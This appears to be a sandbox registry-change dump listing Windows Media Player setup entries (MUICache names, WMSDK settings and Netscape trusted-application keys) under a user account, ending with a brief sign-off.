HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\inf\unregmp2.exe "Microsoft Windows Media Player Setup Utility"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Windows Media Player\wmplayer.exe "Windows Media Player"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General UniqueID "{ECE4B67E-5176-48A8-A4E7-7CD222821F18}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General ComputerName "SANDBOX"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General VolumeSerialNumber dword:20d334b5
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace LocalBase "C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML" "C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace DTDFile "C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD" "C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace LocalDelta "C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML" "C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace RemoteDelta "C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML" "C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications "C:\PROGRA~1\WINDOW~2\wmplayer.exe" "Yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications C:\PROGRA~1\WINDOW~2\wmplayer.exe "Yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications "C:\Program Files\Windows Media Player\wmplayer.exe" "Yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications C:\Program Files\Windows Media Player\wmplayer.exe "Yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\SessionInformation ProgramCount dword:00000001 dword:00000005
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\explorer.exe "Windows Explorer"

Hope you found this informative.